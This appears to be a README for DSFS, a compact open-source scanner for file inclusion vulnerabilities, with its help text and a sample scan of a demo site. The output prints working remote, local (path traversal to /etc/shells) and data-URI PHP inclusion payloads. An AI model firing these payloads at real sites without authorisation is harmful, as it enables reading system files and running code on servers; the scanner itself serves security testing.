https://github.com/stamparm/DSFS
Damn Small FI Scanner (DSFS) is a fully functional File inclusion vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.
As of optional settings it supports HTTP proxy together with HTTP header values User-Agent
, Referer
and Cookie
.
$ python dsfs.py -h Damn Small FI Scanner (DSFS) < 100 LoC (Lines of Code) #v0.1b by: Miroslav Stampar (@stamparm) Usage: dsfs.py [options] Options: --version show program's version number and exit -h, --help show this help message and exit -u URL, --url=URL Target URL (e.g. "http://www.target.com/page.php?id=1") --data=DATA POST data (e.g. "query=test") --cookie=COOKIE HTTP Cookie header value --user-agent=UA HTTP User-Agent header value --random-agent Use randomly selected HTTP User-Agent header value --referer=REFERER HTTP Referer header value --proxy=PROXY HTTP proxy address (e.g. "http://127.0.0.1:8080")
python dsfs.py -u "http://fidemo.cu.cc/fi.php?f=https://raw.githubusercontent.com/stamparm/DSFS/master/files/config.php" Damn Small FI Scanner (DSFS) < 100 LoC (Lines of Code) #v0.1e by: Miroslav Stampar (@stamparm) * scanning GET parameter 'f' (i) GET parameter 'f' appears to be (R)FI vulnerable (e.g.: 'http://fidemo.cu.cc/fi.php?f=https%3A%2F%2Fraw.githubusercontent.com%2Fstamparm%2FDSFS%2Fmaster%2Ffiles%2Fconfig.php') (!) content seems to be dynamically evaluated (i) GET parameter 'f' appears to be (L)FI vulnerable (e.g.: 'http://fidemo.cu.cc/fi.php?f=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshells') (i) GET parameter 'f' appears to be (S)FI vulnerable (e.g.: 'http://fidemo.cu.cc/fi.php?f=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgZWNobyBiYXNlNjRfZGVjb2RlKCdUR1ZuWVd3Z1pHbHpZMnhoYVcxbGNqbz0nKTs%2FPg%3D%3D') (!) content seems to be dynamically evaluated scan results: possible vulnerabilities found
Python version 2.6.x or 2.7.x is required for running this program.